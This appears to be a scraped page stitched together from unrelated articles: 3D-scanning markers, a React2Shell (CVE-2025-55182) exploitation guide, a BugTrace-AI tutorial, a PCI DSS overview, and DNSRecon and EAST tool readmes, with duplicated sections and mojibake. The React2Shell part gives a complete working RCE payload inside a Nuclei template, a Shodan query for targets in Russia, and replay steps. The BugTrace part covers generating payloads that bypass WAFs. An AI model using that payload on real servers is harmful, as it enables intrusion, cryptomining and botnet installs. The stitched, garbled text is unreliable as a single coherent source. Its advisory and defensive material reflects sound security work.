3D scanners rely on being able to identify physical features of an object, and line up what it saw a moment ago with what it sees nowΒ in order to build a 3D model. However, not every object is as distinct and visible as others at all angles, particularly in IR. One solution is reflective scanning markers, which are either pre-printed on a mat, or available as stickers that can be applied to objects to give the scanner a bit more to latch onto, visually speaking.
Magnetic mounts allow mixing and matching, as well as attaching directly to some objects to be scanned.
The main advantage (besides not having to remove stickers from the object afterwards) is that these printed markers present the reflective dots at a variety of angles during the scanning process. This makes the scene less sensitive to scanner angle in general, which is good because the angle at which to scan an important feature of an object is not always the angle that responds best.
By giving the scene more structure, the scanner can have a better shot at scanning reliably even if the reflectors arenβt on the target object itself. It also helps by making it easier to combine multiple scans. The more physical features scans have in common, the easier it is to align them.
Just to be clear, using these means one will, in effect, be 3D scanning the markers along with the target object. But once all the post-processing is done, one simply edits the model to remove everything except the target object.
[firstgizmo]βs DIY magnetic 3D scanning markers are an expanded take on an idea first presented byΒ [Payo], who demonstrates the whole concept wonderfully in the video below.
3D scanning can be tremendously handy but it does have its quirks and limitations, and a tool like this can be the difference between a terrible scan and a serviceable one. For a quick catch-up on 3D scanning and its strengths and limitations, read our hands-on tour of using an all-in-one 3D scanner.
In our industry, we often see serious security flaws that change everything overnight. React2Shell is one of those flaws. On December 3, 2025, security researchers found CVE-2025-55182, a critical bug with a perfect 10.0 severity score that affects React Server Components and Next.js applications. Within hours of going public, hackers started using this bug to break into IoT devices and web servers on a massive scale. By December 8, security teams saw widespread attacks targeting companies across multiple industries, from construction to entertainment.
What makes React2Shell so dangerous is how simple it is to use. Attackers only need to send one malicious HTTP request to take complete control of vulnerable systems. No complicated steps, no extra work required, just one carefully crafted message and the attacker owns the target.
In this article, weβll explore the roots of React2Shell and how we can exploit this vulnerability in IoT devices.
The Technical Mechanics of React2Shell
React2Shell takes advantage of how React Server Components handle the React Flight protocol. The React Flight protocol is what moves server-side components of the web framework around. You can think of React Flight as the language that React Server Components use to communicate. When we talk about deserialization vulnerabilities like React2Shell, weβre talking about data thatβs supposed to be formatted a certain way being misread by the code that receives it. To learn more about deserialization, check our previous article.
Internally, the deserialization payload takes advantage of how React handles Chunks, which are basic building blocks that define what React should render, display, or run. A chunk is basically a building block of a web page β a small piece of data that the server evaluates to render or process the page on the server instead of in the browser. Essentially, all these chunks are put together to build a complete web page with React.
In this vulnerability, the attacker crafts a Chunk that includes a then method. When React Flight sends this data to React Server Components, React treats the value as thenable, something that behaves like a Promise. Promises are essentially a way for code to say it does not have the result of something yet but will run some code and provide the results later. Javascript Reactβs automatic handling or misinterpretation of these promised values is what this exploit abuses.
Implementation of Chunk.prototype.then from the React source
Chunks are referenced with the dollar at token. The attacker has figured out a way to express state within the request forged to the server. With a status of resolved model, the attacker is tricking React Flight into thinking that it has already fulfilled the data in chunk zero. Essentially, the attacker has forged the lifecycle of the request to be further along than it actually is. Because this is resolved as thenable due to the then method by React Server Components, this leads down a code path which eventually executes malicious code.
When Chunk 1 is evaluated, React observes that this is thenable, meaning it appears as a promise. It will refer to Chunk 0 and then attempt to resolve the forged then method. Since the attacker now controls the then resolution path, React Server Components has been tricked into a codepath which the attacker has ultimate control over. When formData.get is set to a value which resolves to a constructor, React treats that field as a reference to a constructor function that it should hydrate during processing of the blob value. This becomes critical because dollar B values are rehydrated by React, and subsequently it must invoke the constructor.
This makes dollar B the execution pivot. By compelling React to hydrate a Blob-like value, React is forced to execute the constructor that the attacker smuggled into formData.get. Since that constructor resolves to the malicious thenable function, React executes the code as part of its hydration process. Lastly, by defining the prefix primitive, the attacker prepends malicious code into the executable codepath. By appending two forward slashes to the payload, the attacker has told Javascript to treat the rest as a commented block, allowing execution of only the attackerβs code and avoiding syntax errors, quite similar to SQL Injection.
Fire Up the PoC
Before working with the exploit, letβs go to Shodan and see how many active sites on Next.js it has indexed.
As you can see, the query: http.component:βNext.jsβ 200 country:βruβ returned more than a thousand results. But of course, not all of them are vulnerable. To check, we can use the following template for Nuclei.
id: cve-2025-55182-react2shell
info:
name: Next.js/React Server Components RCE (React2Shell)
author: assetnote
severity: critical
description: |
Detects CVE-2025-55182 and CVE-2025-66478, a Remote Code Execution vulnerability in Next.js applications using React Server Components.
It attempts to execute 'echo $((1337*10001))' on the server. If successful, the server returns a redirect to '/login?a=11111'.
reference:
- https://github.com/assetnote/react2shell-scanner
- https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id:
- CVE-2025-55182
- CVE-2025-66478
tags: cve, cve2025, nextjs, rce, react
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((1337*10001))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/login?a=13371337"
- "X-Action-Redirect"
condition: and
Next, this command will show whether the web application is vulnerable.
In addition, on Github you can find scanners in different programming languages that do exactly the same thing. Here is an example of a solution from Malayke:
You can create a test environment for this vulnerability with just a few commands:
Commands above create a new Next.js application named my-cve-2025-66478-app using version 16.0.6 of the official setup tool, without installing anything globally. If you open localhost:3000 in your browser, you will see the following.
At this stage, we can proceed to exploit the vulnerability. Open your preferred web app proxy application, such as Burp Suite or ZAP. In this case, I will be using Caido (if you have not used it before, you can familiarize yourself with it in the following articles).
The algorithm is quite simple: we need to catch the request to the site and redirect it to Replay.
After that, we need to change the request from GET to POST and add a payload. The overall request looks like this:
Security researchers have identified multiple instances of React2Shell attacks across different systems. The similar patterns observed in these cases reveal how the attacker operates and which tools they use, at least during the early days following the vulnerabilityβs disclosure.
In the first case, on December 4, 2025, the attacker broke into a vulnerable Next.js system running on Windows and tried to download an unknown file using curl and bash commands. They then tried to download a Linux cryptocurrency miner. About 6 hours later, they tried to download a Linux backdoor. The attackers also ran commands like whoami and echo, which researchers believe was a way to test if commands would run and figure out what operating system was being used.
In the second case, on another Windows computer, the attacker tried to download multiple files from their control servers. Interestingly, the attacker ran the command ver || id, which is a trick to figure out if the system is running Windows or Linux. The ver command shows the Windows version, while id shows user information on Linux. The double pipe operator makes sure the second command only runs if the first one fails, letting the attacker identify the operating system. Like before, the attacker also ran a command to test if their code would run, followed by commands like whoami and hostname to gather user and system information.
In the third case, the attacker followed the same pattern. They first ran commands to test if their code would work and used commands like whoami to gather user information. The attacker then tried to download multiple files from their control servers. The commands follow the same approach: download a shell script, run it with bash, and sometimes delete it to hide evidence.
Unlike the earlier Windows cases, the fourth case targeted a Linux computer running a Next.js application. The attacker successfully broke in and installed an XMRig cryptocurrency miner.
Based on the similar pattern seen across multiple computers, including identical tests and control servers, researchers believe the attacker is likely using automated hacking tools. This is supported by the attempts to use Linux-specific files on Windows computers, showing that the automation doesnβt tell the difference between operating systems. On one of the hacked computers, log analysis showed evidence of automated vulnerability scanning before the attack. The attacker used a publicly available GitHub tool to find vulnerable Next.js systems before launching their attack.
RondoDox Campaign
Security researchers have found a nine-month campaign targeting IoT devices and web applications to build a botnet called RondoDox. This campaign started in early 2025 and has grown through three phases, each one bigger and more advanced than the last.
The first phase ran from March through April 2025 and involved early testing and manual scanning for vulnerabilities. During this time, the attackers were testing their tools and looking for potential targets across the internet. The second phase, from April through June 2025, saw daily mass scanning targeting web applications like WordPress, Drupal, and Struts2, along with IoT devices such as Wavlink routers. The third phase, starting in July and continuing through early December 2025, marked a shift to hourly automated attacks on a large scale, showing the operators had improved their tools and were ready for mass attacks.
When React2Shell was disclosed in December 2025, the RondoDox operators immediately added it to their toolkit alongside other N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. The attacks detected in December follow a consistent pattern. Attackers scan to find vulnerable Next.js servers, then try to install multiple payloads on infected devices. These payloads include cryptocurrency miners, botnet loaders, health checkers, and Mirai botnet variants. The infection chain is designed to stay on systems and resist removal attempts.
A large portion of the attack traffic comes from a datacenter in Poland, with one IP address alone responsible for more than 12,000 React2Shell-related events, along with port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior matches patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks. Additional scanning comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, showing broad global participation in opportunistic attacks.
Mitigation
CVE-2025-55182 exists in several versions including version 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following packages: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Businesses relying on any of these impacted packages should update immediately.
Summary
Cyberwarriors need to make sure their systems are safe from new threats. The React2Shell vulnerability is a serious risk for organizations using React Server Components and Next.js applications. Hackers can exploit this vulnerability to steal personal data, corporate data, and attack critical infrastructure by installing malware. This vulnerability is easy to exploit, and many organizations use the affected software, which has made it popular with botnet operators whoβve quickly added React2Shell to their attack tools. Organizations need to patch right away, use multiple layers of defense, and watch their systems closely to protect against this threat. A vulnerability like React2Shell can take down entire networks if even one application is exposed.
Welcome back, aspiring cyberwarriors and AI enthusiasts!
AI is stepping up in every aspect of our cybersecurity job: STRIDE-GPT generates threat models and mitigations to them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today is a time to explore AI-powered vulnerability scanning.
In this article, weβll cover the BugTrace-AI toolkit from installation through advanced usage. Weβll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Letβs get rolling!
What Is BugTrace-AI?
BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.
The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.
Itβs important to recognize that this tool functions as an assistant rather than an automated exploitation tool. Based on that, we should understand that all findings should be deliberately validated.
Step #1: Installation
First of all, we need to clone the repository from GitHub:
After listing the content of the downloaded directory, we can see the script we need β dockerizer.sh. We need to add execution permissions and launch it.
kali> chmod +x dockerizer.sh
kali> sudo ./dockerizer.sh
At this point, you may encounter an issue with the script, as it is currently incompatible with Docker Compose version 2 at the time of writing. To fix the script, you can manually change it or use the following:
#!/bin/bash set -e
COMPOSE_FILE="docker-compose.yml"
echo "--- Stopping any previous containers... ---" docker compose -f "$COMPOSE_FILE" down -v || \ echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."
echo "--- Building and starting the application... ---" docker compose -f "$COMPOSE_FILE" up --build -d
echo "--- Application is now running! ---" echo "Access it at: http://localhost:6869" echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"
# === Try to launch Firefox with checks === sleep 3 # Give the container a moment to start
if [ -z "$DISPLAY" ]; then echo "β οΈ No GUI detected (DISPLAY is not set)." echo "π‘ Open http://localhost:6869 manually in your browser." elif ! command -v firefox &> /dev/null; then echo "β οΈ Firefox is not installed." echo "π‘ Install it with: sudo apt install firefox" else echo "π Launching Firefox..." firefox http://localhost:6869 & fi
After updating the script, you should see the process of building the Docker image and starting the container in detached mode.
After finishing, you can now access BugTrace-AI atΒ http://localhost:6869. You will see the disclaimer similar to the one below.
If you accept it, the app will load the main screen.
Step #2: Configuring API Access
BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you donβt already have one. Navigate to the API keys section and generate a new key.
In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.
Step #3: Understanding the Three Scan Modes
BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.
The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.
The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains βsimulated activeβ because it doesnβt actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named βidβ or βuserβ might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and guides how to test them manually.
The Grey Box Scan combines DAST with SAST by analyzing the pageβs live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.
For this exercise, weβll analyze a web application with the third mode.
The tool generates a report summarizing its findings.
BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.
Step #4: Payload Generation Tools
Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.
The tool generates a few dozen payloads. Each of them includes an explanation of the obfuscation technique used and the specific WAF detection methods itβs designed to evade.
Besides that, BugTrace-AI suggests SSTI payloads and OOB Interaction Helper.
Summary
BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.
In this article, we installed the tool and tested some of its features. But, this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.
If you want to dive deeper into using AI for hacking, consider checking out AI for Cybersecurity training. This 7-hour video course, led by a Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.
Continuous Vulnerability Management: The New Cybersecurity Imperative Security leaders are drowning in data but starving for actionable insights. Traditional penetration testing has become a snapshot of vulnerability that expires faster...
Hello, aspiring ethical hackers. In our previous blogpost, you learnt about vulnerability scanning. In this article, you will learn about Nuclei, a high performance, fast and customizable vulnerability scanner that uses YAML based templates. Its features include, Letβs see how this tool works. For this, we will be using Kali Linux as attacker system as [β¦]
Did you know that there are approximately 12.52 million credit card users in Australia, along with 43.77 million actively issued debit cards? These figures reflect Australiaβs heavy reliance on digital payments and card-based transactions for everyday purchases and online commerce. However, with this widespread adoption comes an equally significant risk which is the growing threat of data breaches and payment fraud.
As digital transactions continue to grow, so do the challenges of protecting sensitive customer data. This is where PCI DSS (Payment Card Industry Data Security Standard) compliance becomes essential for Australian businesses.
In todayβs article, we are going to learn how PCI DSS compliance protects businesses from data breaches. So, if you are wondering why you should invest in PCI DSS compliance in Australia and how it can safeguard your organization, keep reading to find out.
A brief introduction to PCI DSS
PCI DSS is a global data security framework that protects businesses handling cardholder data (CHD) from data breaches, fraud, and identity theft. It was first introduced in December 2004, by the founding members of American Express, Discover, JCB, MasterCard, and Visa International.
PCI DSS applies to any and every organization, regardless of size, that accepts, processes, stores, or transmits payment card data. Its framework consists of 12 core PCI DSS requirements grouped into six control objectives, which include:
Building and maintaining a secure network: Implementing firewalls and secure configurations.
Protecting cardholder data: Encrypting sensitive data during transmission.
Maintaining a vulnerability management program: Regularly updating anti-virus software and conducting vulnerability scans.
Implementing strong access control measures: Limiting access to cardholder data based on job responsibilities.
Regular monitoring and testing of networks: Performing routine security assessments.
Maintaining an information security policy: Establishing a documented security strategy.
The latest version PCI DSS v.4.0, was released on March 31, 2022, introducing enhanced security measures to address evolving cyber threats. These updates include increased flexibility for businesses and stronger authentication requirements, ensuring better protection in todayβs dynamic digital landscape.
You may also check our latest YouTube video on PCI DSS 4.0 requirements which explains the changes from version 3.2.1 to 4.0.
The growing threat of data breaches in Australia
As Australiaβs digital landscape continues to expand, the frequency and severity of data breaches are becoming increasingly concerning. In fact, the landscape of data security in Australia is becoming alarmingly dangerous, with a significant rise in data breaches posing a growing threat to businesses and individuals alike.
In the first quarter of 2024 alone, there were around 1.8 million accounts were leaked witnessing a 388% increase in compromised user accounts. This marks the severity of the data breaches exploited due to the soaring technology, and compliance negligence.
The financial implications of these breaches are profound. According to IBMβs annual Cost of a Data Breach Report 2024, the average cost of a data breach in Australia is estimated at AUD $4.26 million, which is said to have increased by 27% since 2020. These breaches not only affect an organizationβs financial stability but also damage its reputation and erode customer trust. As cybercriminals continue to evolve their tactics, businesses must prioritize strong cybersecurity measures to mitigate these risks.
This is where the PCI DSS comes into play. While PCI DSS is not mandated by the Australian government, it is considered an important industry standard enforced by payment card brands.Β Achieving PCI DSS compliance ensures strong protection of sensitive payment data, reducing the risk of breaches and associated penalties. Moreover, compliance demonstrates your commitment to cybersecurity, boosting customer confidence in your business.
How PCI DSS protects your business from data breaches
PCI DSS provides a comprehensive framework that helps businesses defend against data breaches and payment fraud by implementing security measures specifically designed for handling payment card data. Hereβs how PCI DSS compliance safeguards Australian businesses:
1. Encryption of payment card data
One of the key requirements of PCI DSS is the encryption of cardholder data both in transit and at rest. This ensures that even if cybercriminals manage to intercept the data, they will not be able to decrypt it and misuse it. By implementing robust encryption, businesses can significantly reduce the likelihood of their payment card data being exposed during a breach.
2. Secure network architecture
PCI DSS mandates businesses to establish and maintain a secure network with firewalls and other security configurations to protect against unauthorized access. By isolating payment card systems from the rest of the corporate network, businesses can minimize vulnerabilities and reduce the risk of data breaches.
3. Regular vulnerability scanning and penetration testing
PCI DSS requires ongoing vulnerability scans and penetration testing to identify and remediate potential security flaws before they can be exploited. This proactive approach ensures that systems are continuously evaluated for weaknesses and can quickly adapt to emerging cyber threats.
4. Access control and authentication
PCI DSS enforces stringent access control measures, ensuring that only authorized personnel can access sensitive payment card data. Through multi-factor authentication (MFA) and role-based access controls, businesses can limit exposure to potential breaches by restricting access based on job responsibilities.
5. Monitoring and logging
Constant monitoring and logging of payment systems are essential for detecting suspicious activities and mitigating data breaches. PCI DSS requires businesses to log all access and activities involving payment card data, which can be used to identify anomalies and investigate potential breaches swiftly.
6. Security awareness and staff training
Employees are often the weakest link in cybersecurity. PCI DSS emphasizes the importance of regular security training to ensure staff members understand the latest threats and best practices for safeguarding payment data. This harbours a culture of security within the organization and helps prevent human errors that could lead to breaches.
To Conclude
The rising threat of data breaches in Australia underscores the critical importance of robust cybersecurity practices. For businesses handling payment card data, PCI DSS compliance is a vital step toward safeguarding sensitive information, building customer trust, and mitigating financial and reputational risks. By adopting this globally recognized framework, organizations can strengthen their security posture and stay resilient against evolving cyber threats.
DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX). Top-level domain expansion for a defined domain.
With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.
Install
git clone https://github.com/micro-joan/dnsrecon-gui cd dnsrecon-gui/ chmod +x run.sh ./run.sh
After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:
Use
When the tool is ready to use the same installer will give you a URL that you must put in the browser in a private window so every time you do a search you will have to open a new window in private or clear your browser cache to refresh the graphics.
ThisΒ toolkitΒ contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.
This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.
Installation now accounts for use of Azure Cloud Shell's updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)
Checking of Databricks cluster types as per advisory
Audits Databricks clusters for potential privilege elevation - This control requires typically permissions on the databricks cluster"
Content.json is has now key and content based sorting. This enables doing delta checks with git diff HEAD^1 ΒΉ as content.json has predetermined order of results
ΒΉWord of caution, if want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore exposing results to any upstream you might have configured.
Use this feature with caution, and ensure you don't have public upstream set for the branch you are using this feature for
Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using var to let in for await -style loops
Important
Current status of the tool is beta
Fixes, updates etc. are done on "Best effort" basis, with no guarantee of time, or quality of the possible fix applied
We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
All the calls in the service are largely to Azure Cloud IP's, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
Lot of the code is "AS IS": Meaning, it's been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
As the name implies, we use it as tool to evaluate environments. It is not meant to be run as unmonitored for the time being, and should not be run in any internet exposed service that accepts incoming connections.
Documentation could be described as incomplete for the time being
EAST is mostly focused on PaaS resource, as most of our Azure assessments focus on this resource type
No Input sanitization is performed on launch params, as it is always assumed, that the input of these parameters are controlled. That being said, the tool uses extensively exec() - While I have not reviewed all paths, I believe that achieving shellcode execution is trivial. This tool does not assume hostile input, thus the recommendation is that you don't paste launch arguments into command line without reviewing them first.
Tool operation
Depedencies
To reduce amount of code we use the following depedencies for operation and aesthetics are used (Kudos to the maintainers of these fantastic packages)
Other depedencies for running the tool: If you are planning to run this in Azure Cloud Shell you don't need to install Azure CLI:
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
Azure Cloud Shell (BASH) or applicable Linux Distro / WSL
if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }
Advanced
Advanced controls include checks beyond the initial ARM object. Often invoking new requests to get further information about the resource in scope and it's relation to other services.
Example: Role Assignments
Besides checking the role assignments of subscription, additional check is performed via Azure AD Conditional Access Reporting for MFA, and that privileged accounts are not only protected by passwords (SPN's with client secrets)
Azure Data Factory pipeline mapping combines pipelines -> activities -> and data targets together and then checks for secrets leaked on the logs via run history of the said activities.
Composite
Composite controls combines two or more control results from pipeline, in order to form one, or more new controls. Using composites solves two use cases for EAST
You cant guarantee an order of control results being returned in the pipeline
You need to return more than one control result from single check
Get alerts from Microsoft Cloud Defender on subscription check
Form new controls per resourceProvider for alerts
Reporting
EAST is not focused to provide automated report generation, as it provides mostly JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which are fairly trivial to automate via markdown creation scripts and tools such as Pandoc
While focus is not on the reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in single document format.
cff-version: 1.2.0 title: Pandoc message: "If you use this software, please cite it as below." type: software url: "https://github.com/jgm/pandoc" authors: - given-names: John family-names: MacFarlane email: jgm@berkeley.edu orcid: 'https://orcid.org/0000-0003-2557-9090' - given-names: Albert family-names: Krewinkel email: tarleb+github@moltkeplatz.de orcid: '0000-0002-9455-0796' - given-names: Jesse family-names: Rosenthal email: jrosenthal@jhu.edu
Running EAST scan
This part has guide how to run this either on BASH@linux, or BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but does not require that you have your own linux box to use this)
β οΈIf you are running the tool in Cloud Shell, you might need to reapply some of the installations again as Cloud Shell does not persist various session settings.
Detailed Prerequisites (This is if you opted no to do the "fire and forget version")
Prerequisites
git clone https://github.com/jsa2/EAST --branch preview cd EAST; npm install
Pandoc installation on cloud shell
# Get pandoc for reporting (first time only) wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz"; tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~
Installing pandoc on distros that support APT
# Get pandoc for reporting (first time only) sudo apt install pandoc
Login Az CLI and run the scan
# Relogin is required to ensure token cache is placed on session on cloud shell
az account clear az login
# cd EAST # replace the subid below with your subscription ID! subId=6193053b-408b-44d0-b20f-4e29b9b67394 # node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId
Generate report
cd EAST; node templatehelpers/eastReports.js --doc
If you want to include all Azure Security Benchmark results in the report
cd EAST; node templatehelpers/eastReports.js --doc --asb
Share relevant controls across multiple environments as community effort
Company use
Companies have possibility to develop company specific controls which apply to company specific work. Companies can then control these implementations by decision to share, or not share them based on the operating principle of that company.
Non IPR components
Code logic and functions are under MIT license. since code logic and functions are alredy based on open-source components & vendor API's, it does not make sense to restrict something that is already based on open source
If you use this tool as part of your commercial effort we only require, that you follow the very relaxed terms of MIT license
Use rich and maintained context of Microsoft Azure CLIlogin & commands with Node.js control flow which supplies enhanced rest-requests and maps results to schema.
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
β Using Node.js runtime as orchestrator utilises Nodes asynchronous nature allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Managers incredible speed.
β Compared to running requests one-by-one, the speedup can be up to 10x, when Node executes the batch of requests instead of single request at time
clears tokens in session folder, use this if you get authorization errors, or have just changed to other az login account use az account clear if you want to clear AZ CLI cache too
no values
--tag
Filter all results in the end based on single tag--tag=svc=aksdev
no values
--ignorePreCheck
use this option when used with browser delegated tokens
no values
--helperTexts
Will append text descriptions from general to manual controls
no values
--reprocess
Will update results to existing content.json. Useful for incremental runs
no values
Parameters reference for example report:
node templatehelpers/eastReports.js --asb
Param
Description
Default if undefined
--asb
gets all ASB results available to users
no values
--policy
gets all Policy results available to users
no values
--doc
prints pandoc string for export to console
no values
(Highly experimental) Running in restricted environments where only browser use is available
β οΈDetect principals in privileged subscriptions roles protected only by password-based single factor authentication.
Checks for users without MFA policies applied for set of conditions
Checks for ServicePrincipals protected only by password (as opposed to using Certificate Credential, workload federation and or workload identity CA policy)
An unused credential on an application can result in security breach. While it's convenient to use password. secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application
Following methods work for contributing for the time being:
Submit a pull request with code / documentation change
Submit a issue
issue can be a:
β οΈProblem (issue)
οFeature request
βQuestion
Other
By default EAST tries to work with the current depedencies - Introducing new (direct) depedencies is not directly encouraged with EAST. If such vital depedency is introduced, then review licensing of such depedency, and update readme.md - depedencies
There is nothing to prevent you from creating your own fork of EAST with your own depedencies
DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX). Top-level domain expansion for a defined domain.
With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.
Install
git clone https://github.com/micro-joan/dnsrecon-gui cd dnsrecon-gui/ chmod +x run.sh ./run.sh
After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:
Use
When the tool is ready to use the same installer will give you a URL that you must put in the browser in a private window so every time you do a search you will have to open a new window in private or clear your browser cache to refresh the graphics.
ThisΒ toolkitΒ contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.
This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.
Installation now accounts for use of Azure Cloud Shell's updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)
Checking of Databricks cluster types as per advisory
Audits Databricks clusters for potential privilege elevation - This control requires typically permissions on the databricks cluster"
Content.json is has now key and content based sorting. This enables doing delta checks with git diff HEAD^1 ΒΉ as content.json has predetermined order of results
ΒΉWord of caution, if want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore exposing results to any upstream you might have configured.
Use this feature with caution, and ensure you don't have public upstream set for the branch you are using this feature for
Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using var to let in for await -style loops
Important
Current status of the tool is beta
Fixes, updates etc. are done on "Best effort" basis, with no guarantee of time, or quality of the possible fix applied
We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
All the calls in the service are largely to Azure Cloud IP's, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
